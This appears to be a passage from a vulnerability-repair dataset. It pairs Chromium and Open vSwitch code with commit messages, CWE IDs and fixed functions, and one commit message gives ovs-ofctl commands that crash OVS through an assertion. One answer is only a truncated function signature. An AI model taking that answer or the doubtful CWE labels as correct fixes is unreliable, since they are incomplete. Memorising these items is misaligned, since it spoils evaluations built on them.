validators_.read_pixel_format.AddValue(GL_RED_EXT); validators_.read_pixel_format.AddValue(GL_RG_EXT); validators_.render_buffer_format.AddValue(GL_R8_EXT); validators_.render_buffer_format.AddValue(GL_RG8_EXT); validators_.texture_unsized_internal_format.AddValue(GL_RED_EXT); validators_.texture_unsized_internal_format.AddValue(GL_RG_EXT); validators_.texture_internal_format_storage.AddValue(GL_R8_EXT); validators_.texture_internal_format_storage.AddValue(GL_RG8_EXT); feature_flags_.gpu_memory_buffer_formats.Add(gfx::BufferFormat::R_8); feature_flags_.gpu_memory_buffer_formats.Add(gfx::BufferFormat::RG_88); } UMA_HISTOGRAM_BOOLEAN("GPU.TextureRG", feature_flags_.ext_texture_rg); if (gl_version_info_->is_desktop_core_profile || (gl_version_info_->IsAtLeastGL(2, 1) && gfx::HasExtension(extensions, "GL_ARB_texture_rg")) || gfx::HasExtension(extensions, "GL_EXT_texture_norm16")) { feature_flags_.ext_texture_norm16 = true; g_r16_is_present = true; validators_.pixel_type.AddValue(GL_UNSIGNED_SHORT); validators_.texture_format.AddValue(GL_RED_EXT); validators_.texture_internal_format.AddValue(GL_R16_EXT); validators_.texture_internal_format.AddValue(GL_RED_EXT); validators_.texture_unsized_internal_format.AddValue(GL_RED_EXT); validators_.texture_internal_format_storage.AddValue(GL_R16_EXT); feature_flags_.gpu_memory_buffer_formats.Add(gfx::BufferFormat::R_16); } UMA_HISTOGRAM_ENUMERATION( "GPU.TextureR16Ext_LuminanceF16", GpuTextureUMAHelper(), static_cast<int>(GpuTextureResultR16_L16::kMax) + 1); if (enable_es3 && gfx::HasExtension(extensions, "GL_EXT_window_rectangles")) { AddExtensionString("GL_EXT_window_rectangles"); feature_flags_.ext_window_rectangles = true; validators_.g_l_state.AddValue(GL_WINDOW_RECTANGLE_MODE_EXT); validators_.g_l_state.AddValue(GL_MAX_WINDOW_RECTANGLES_EXT); validators_.g_l_state.AddValue(GL_NUM_WINDOW_RECTANGLES_EXT); validators_.indexed_g_l_state.AddValue(GL_WINDOW_RECTANGLE_EXT); } bool has_opengl_dual_source_blending = gl_version_info_->IsAtLeastGL(3, 3) || (gl_version_info_->IsAtLeastGL(3, 2) && gfx::HasExtension(extensions, "GL_ARB_blend_func_extended")); if (!disable_shader_translator_ && !workarounds_.get_frag_data_info_bug && ((gl_version_info_->IsAtLeastGL(3, 2) && has_opengl_dual_source_blending) || (gl_version_info_->IsAtLeastGLES(3, 0) && gfx::HasExtension(extensions, "GL_EXT_blend_func_extended")))) { feature_flags_.ext_blend_func_extended = true; AddExtensionString("GL_EXT_blend_func_extended"); validators_.dst_blend_factor.AddValue(GL_SRC_ALPHA_SATURATE_EXT); validators_.src_blend_factor.AddValue(GL_SRC1_ALPHA_EXT); validators_.dst_blend_factor.AddValue(GL_SRC1_ALPHA_EXT); validators_.src_blend_factor.AddValue(GL_SRC1_COLOR_EXT); validators_.dst_blend_factor.AddValue(GL_SRC1_COLOR_EXT); validators_.src_blend_factor.AddValue(GL_ONE_MINUS_SRC1_COLOR_EXT); validators_.dst_blend_factor.AddValue(GL_ONE_MINUS_SRC1_COLOR_EXT); validators_.src_blend_factor.AddValue(GL_ONE_MINUS_SRC1_ALPHA_EXT); validators_.dst_blend_factor.AddValue(GL_ONE_MINUS_SRC1_ALPHA_EXT); validators_.g_l_state.AddValue(GL_MAX_DUAL_SOURCE_DRAW_BUFFERS_EXT); } #if !defined(OS_MACOSX) if (workarounds_.ignore_egl_sync_failures) { gl::GLFenceEGL::SetIgnoreFailures(); } #endif if (workarounds_.avoid_egl_image_target_texture_reuse) { TextureDefinition::AvoidEGLTargetTextureReuse(); } if (gl_version_info_->IsLowerThanGL(4, 3)) { feature_flags_.emulate_primitive_restart_fixed_index = true; } feature_flags_.angle_robust_client_memory = gfx::HasExtension(extensions, "GL_ANGLE_robust_client_memory"); feature_flags_.khr_debug = gl_version_info_->IsAtLeastGL(4, 3) || gl_version_info_->IsAtLeastGLES(3, 2) || gfx::HasExtension(extensions, "GL_KHR_debug"); feature_flags_.chromium_gpu_fence = gl::GLFence::IsGpuFenceSupported(); if (feature_flags_.chromium_gpu_fence) AddExtensionString("GL_CHROMIUM_gpu_fence"); feature_flags_.chromium_bind_generates_resource = gfx::HasExtension(extensions, "GL_CHROMIUM_bind_generates_resource"); feature_flags_.angle_webgl_compatibility = is_webgl_compatibility_context; feature_flags_.chromium_copy_texture = gfx::HasExtension(extensions, "GL_CHROMIUM_copy_texture"); feature_flags_.chromium_copy_compressed_texture = gfx::HasExtension(extensions, "GL_CHROMIUM_copy_compressed_texture"); feature_flags_.angle_client_arrays = gfx::HasExtension(extensions, "GL_ANGLE_client_arrays"); feature_flags_.angle_request_extension = gfx::HasExtension(extensions, "GL_ANGLE_request_extension"); feature_flags_.ext_debug_marker = gfx::HasExtension(extensions, "GL_EXT_debug_marker"); feature_flags_.arb_robustness = gfx::HasExtension(extensions, "GL_ARB_robustness"); feature_flags_.khr_robustness = gfx::HasExtension(extensions, "GL_KHR_robustness"); feature_flags_.ext_robustness = gfx::HasExtension(extensions, "GL_EXT_robustness"); feature_flags_.ext_pixel_buffer_object = gfx::HasExtension(extensions, "GL_ARB_pixel_buffer_object") || gfx::HasExtension(extensions, "GL_NV_pixel_buffer_object"); feature_flags_.ext_unpack_subimage = gfx::HasExtension(extensions, "GL_EXT_unpack_subimage"); feature_flags_.oes_rgb8_rgba8 = gfx::HasExtension(extensions, "GL_OES_rgb8_rgba8"); feature_flags_.angle_robust_resource_initialization = gfx::HasExtension(extensions, "GL_ANGLE_robust_resource_initialization"); feature_flags_.nv_fence = gfx::HasExtension(extensions, "GL_NV_fence"); feature_flags_.unpremultiply_and_dither_copy = !is_passthrough_cmd_decoder_; if (feature_flags_.unpremultiply_and_dither_copy) AddExtensionString("GL_CHROMIUM_unpremultiply_and_dither_copy"); feature_flags_.separate_stencil_ref_mask_writemask = !(gl_version_info_->is_d3d) && !IsWebGLContext(); if (gfx::HasExtension(extensions, "GL_MESA_framebuffer_flip_y")) { feature_flags_.mesa_framebuffer_flip_y = true; validators_.framebuffer_parameter.AddValue(GL_FRAMEBUFFER_FLIP_Y_MESA); AddExtensionString("GL_MESA_framebuffer_flip_y"); } if (is_passthrough_cmd_decoder_ && gfx::HasExtension(extensions, "GL_OVR_multiview2")) { AddExtensionString("GL_OVR_multiview2"); feature_flags_.ovr_multiview2 = true; } if (is_passthrough_cmd_decoder_ && gfx::HasExtension(extensions, "GL_KHR_parallel_shader_compile")) { AddExtensionString("GL_KHR_parallel_shader_compile"); feature_flags_.khr_parallel_shader_compile = true; validators_.g_l_state.AddValue(GL_MAX_SHADER_COMPILER_THREADS_KHR); validators_.shader_parameter.AddValue(GL_COMPLETION_STATUS_KHR); validators_.program_parameter.AddValue(GL_COMPLETION_STATUS_KHR); AddExtensionString("GL_CHROMIUM_completion_query"); feature_flags_.chromium_completion_query = true; } if (gfx::HasExtension(extensions, "GL_KHR_robust_buffer_access_behavior")) { AddExtensionString("GL_KHR_robust_buffer_access_behavior"); feature_flags_.khr_robust_buffer_access_behavior = true; } if (!is_passthrough_cmd_decoder_ || gfx::HasExtension(extensions, "GL_ANGLE_multi_draw")) { feature_flags_.webgl_multi_draw = true; AddExtensionString("GL_WEBGL_multi_draw"); if (gfx::HasExtension(extensions, "GL_ANGLE_instanced_arrays") || feature_flags_.angle_instanced_arrays || gl_version_info_->is_es3 || gl_version_info_->is_desktop_core_profile) { feature_flags_.webgl_multi_draw_instanced = true; AddExtensionString("GL_WEBGL_multi_draw_instanced"); } } if (gfx::HasExtension(extensions, "GL_NV_internalformat_sample_query")) { feature_flags_.nv_internalformat_sample_query = true; } if (gfx::HasExtension(extensions, "GL_AMD_framebuffer_multisample_advanced")) { feature_flags_.amd_framebuffer_multisample_advanced = true; AddExtensionString("GL_AMD_framebuffer_multisample_advanced"); } }
172,528
Analyze the following vulnerable code snippet, the commit message, and the CWE ID. Determine the impact category of this vulnerability. Output the fixed function only. Remember, I want response with just the fixed code only, No explanation.
Code: void CrosLibrary::TestApi::SetPowerLibrary( PowerLibrary* library, bool own) { library_->power_lib_.SetImpl(library, own); } Commit Message: chromeos: Replace copy-and-pasted code with macros. This replaces a bunch of duplicated-per-library cros function definitions and comments. BUG=none TEST=built it Review URL: http://codereview.chromium.org/6086007 git-svn-id: svn://svn.chromium.org/chrome/trunk/src@70070 0039d316-1c4b-4281-b951-d872f2087c98 CWE ID: CWE-189
void CrosLibrary::TestApi::SetPowerLibrary(
170,643
Analyze the following vulnerable code snippet, the commit message, and the CWE ID. Determine the impact category of this vulnerability. Output the fixed function only. Remember, I want response with just the fixed code only, No explanation.
Code: bool AddInitialUrlToPreconnectPrediction(const GURL& initial_url, PreconnectPrediction* prediction) { GURL initial_origin = initial_url.GetOrigin(); static const int kMinSockets = 2; if (!prediction->requests.empty() && prediction->requests.front().origin == initial_origin) { prediction->requests.front().num_sockets = std::max(prediction->requests.front().num_sockets, kMinSockets); } else if (initial_origin.is_valid() && initial_origin.SchemeIsHTTPOrHTTPS()) { url::Origin origin = url::Origin::Create(initial_origin); prediction->requests.emplace(prediction->requests.begin(), initial_origin, kMinSockets, net::NetworkIsolationKey(origin, origin)); } return !prediction->requests.empty(); } Commit Message: Origins should be represented as url::Origin (not as GURL). As pointed out in //docs/security/origin-vs-url.md, origins should be represented as url::Origin (not as GURL). This CL applies this guideline to predictor-related code and changes the type of the following fields from GURL to url::Origin: - OriginRequestSummary::origin - PreconnectedRequestStats::origin - PreconnectRequest::origin The old code did not depend on any non-origin parts of GURL (like path and/or query). Therefore, this CL has no intended behavior change. Bug: 973885 Change-Id: Idd14590b4834cb9d50c74ed747b595fe1a4ba357 Reviewed-on: https://chromium-review.googlesource.com/c/chromium/src/+/1895167 Commit-Queue: Łukasz Anforowicz <lukasza@chromium.org> Reviewed-by: Alex Ilin <alexilin@chromium.org> Cr-Commit-Position: refs/heads/master@{#716311} CWE ID: CWE-125
bool AddInitialUrlToPreconnectPrediction(const GURL& initial_url, PreconnectPrediction* prediction) { url::Origin initial_origin = url::Origin::Create(initial_url); static const int kMinSockets = 2; if (!prediction->requests.empty() && prediction->requests.front().origin == initial_origin) { prediction->requests.front().num_sockets = std::max(prediction->requests.front().num_sockets, kMinSockets); } else if (!initial_origin.opaque() && (initial_origin.scheme() == url::kHttpScheme || initial_origin.scheme() == url::kHttpsScheme)) { prediction->requests.emplace( prediction->requests.begin(), initial_origin, kMinSockets, net::NetworkIsolationKey(initial_origin, initial_origin)); } return !prediction->requests.empty(); }
172,369
Analyze the following vulnerable code snippet, the commit message, and the CWE ID. Determine the impact category of this vulnerability. Output the fixed function only. Remember, I want response with just the fixed code only, No explanation.
Code: OVS_REQUIRES(ofproto_mutex) { const struct rule_actions *actions = rule_get_actions(rule); /* A rule may not be reinserted. */ ovs_assert(rule->state == RULE_INITIALIZED); if (rule->hard_timeout || rule->idle_timeout) { ovs_list_insert(&ofproto->expirable, &rule->expirable); } cookies_insert(ofproto, rule); eviction_group_add_rule(rule); if (actions->has_meter) { meter_insert_rule(rule); } if (actions->has_groups) { const struct ofpact_group *a; OFPACT_FOR_EACH_TYPE_FLATTENED (a, GROUP, actions->ofpacts, actions->ofpacts_len) { struct ofgroup *group; group = ofproto_group_lookup(ofproto, a->group_id, OVS_VERSION_MAX, false); ovs_assert(group != NULL); group_add_rule(group, rule); } } rule->state = RULE_INSERTED; } Commit Message: ofproto: Fix OVS crash when reverting old flows in bundle commit During bundle commit flows which are added in bundle are applied to ofproto in-order. In case if a flow cannot be added (e.g. flow action is go-to group id which does not exist), OVS tries to revert back all previous flows which were successfully applied from the same bundle. This is possible since OVS maintains list of old flows which were replaced by flows from the bundle. While reinserting old flows ovs asserts due to check on rule state != RULE_INITIALIZED. This will work only for new flows, but for old flow the rule state will be RULE_REMOVED. This is causing an assert and OVS crash. The ovs assert check should be modified to != RULE_INSERTED to prevent any existing rule being re-inserted and allow new rules and old rules (in case of revert) to get inserted. Here is an example to trigger the assert: $ ovs-vsctl add-br br-test -- set Bridge br-test datapath_type=netdev $ cat flows.txt flow add table=1,priority=0,in_port=2,actions=NORMAL flow add table=1,priority=0,in_port=3,actions=NORMAL $ ovs-ofctl dump-flows -OOpenflow13 br-test cookie=0x0, duration=2.465s, table=1, n_packets=0, n_bytes=0, priority=0,in_port=2 actions=NORMAL cookie=0x0, duration=2.465s, table=1, n_packets=0, n_bytes=0, priority=0,in_port=3 actions=NORMAL $ cat flow-modify.txt flow modify table=1,priority=0,in_port=2,actions=drop flow modify table=1,priority=0,in_port=3,actions=group:10 $ ovs-ofctl bundle br-test flow-modify.txt -OOpenflow13 First flow rule will be modified since it is a valid rule. However second rule is invalid since no group with id 10 exists. Bundle commit tries to revert (insert) the first rule to old flow which results in ovs_assert at ofproto_rule_insert__() since old rule->state = RULE_REMOVED. Signed-off-by: Vishal Deep Ajmera <vishal.deep.ajmera@ericsson.com> Signed-off-by: Ben Pfaff <blp@ovn.org> CWE ID: CWE-617
OVS_REQUIRES(ofproto_mutex) { const struct rule_actions *actions = rule_get_actions(rule); /* A rule may not be reinserted. */ ovs_assert(rule->state != RULE_INSERTED); if (rule->hard_timeout || rule->idle_timeout) { ovs_list_insert(&ofproto->expirable, &rule->expirable); } cookies_insert(ofproto, rule); eviction_group_add_rule(rule); if (actions->has_meter) { meter_insert_rule(rule); } if (actions->has_groups) { const struct ofpact_group *a; OFPACT_FOR_EACH_TYPE_FLATTENED (a, GROUP, actions->ofpacts, actions->ofpacts_len) { struct ofgroup *group; group = ofproto_group_lookup(ofproto, a->group_id, OVS_VERSION_MAX, false); ovs_assert(group != NULL); group_add_rule(group, rule); } } rule->state = RULE_INSERTED; }
169,024